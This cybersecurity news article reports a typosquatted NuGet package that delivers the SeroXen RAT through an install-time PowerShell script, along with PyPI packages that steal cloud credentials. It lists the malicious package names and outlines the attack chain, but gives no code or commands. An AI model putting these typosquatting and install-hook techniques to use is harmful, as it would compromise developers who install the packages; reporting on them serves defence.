In a recent development, a nefarious package hosted on the NuGet package manager for the .NET Framework has been uncovered, acting as a delivery mechanism for the SeroXen RAT, a remote access trojan. The package in question, named “Pathoschild.Stardew.Mod.Build.Config,” was published by a user with the handle “Disti.” Interestingly, this package disguises itself through typosquatting, closely resembling the legitimate “Pathoschild.Stardew.ModBuildConfig” package. This revelation was made by Phylum, a software supply chain security firm.
The authentic package has garnered nearly 79,000 downloads, whereas the malevolent variant has artificially inflated its download count since its publication on October 6, 2023, surpassing 100,000 downloads.
The profile behind this malicious package has also published six other packages, accumulating over 2.1 million downloads in total. Four of these packages masquerade as crypto service libraries for platforms like Kraken, KuCoin, Solana, and Monero. However, their true purpose is to deploy the SeroXen RAT.
The attack process is set in motion during the package installation via a “tools/init.ps1” script. This script is cunningly designed to execute code without triggering any warnings, a vulnerability previously disclosed by JFrog in March 2023, which had been exploited to retrieve next-stage malware.
The PowerShell script within the package is employed to download a file known as “x.bin” from a remote server. This file is, in reality, a heavily obfuscated Windows Batch script responsible for constructing and executing another PowerShell script, ultimately deploying the SeroXen RAT.
SeroXen RAT is a readily available malware, priced at $60 for a lifetime license, making it accessible to cybercriminals. This fileless RAT amalgamates the capabilities of Quasar RAT, the r77 rootkit, and the Windows command-line tool NirCmd.
This discovery highlights the ongoing exploitation of open-source ecosystems and the developers who use them. It serves as a reminder of the need for vigilance and security within these ecosystems.
This development coincides with the detection of seven malicious packages on the Python Package Index (PyPI) repository. These packages impersonate legitimate offerings from cloud service providers like Aliyun, AWS, and Tencent Cloud, covertly transmitting credentials to a concealed remote URL.
These packages include:
· Python-alibabacloud-tea-openapi.
· Aws-enumerate-iam.
· Enumerate-iam-aws.
· Alisdkcore.
· Tencent-cloud-python-sdk.
· Python-alibabacloud-sdk-core.
· Alibabacloud-oss2.
In this campaign, the attacker exploits a developer’s trust by subtly inserting malicious code into existing, well-established codebases, aiming to exfiltrate sensitive cloud credentials. The attacker’s strategy is minimalistic yet effective, as the malicious code preserves the original functionality of the packages, attempting to remain unnoticed.
Checkmarx, which also disclosed further details of this campaign, revealed an additional target: Telegram. The attackers utilized a deceptive package called “telethon2,” aiming to mimic “telethon,” a Python library for interacting with Telegram’s API.
The majority of downloads of these counterfeit libraries originate from the United States, followed by China, Hong Kong, Singapore, France, and Russia. The malicious code within these packages is strategically hidden within functions, designed to trigger only when these functions are called, leveraging typosquatting and StarJacking techniques to deceive developers into downloading their malicious packages.
Earlier this month, Checkmarx exposed an elaborate campaign on PyPI, where 271 malicious Python packages were introduced to the software supply chain. These packages were equipped with functions to dismantle system defenses, and they collectively received approximately 75,000 downloads before being removed.
CyberSec84 | Cybersecurity news. 
Leave a comment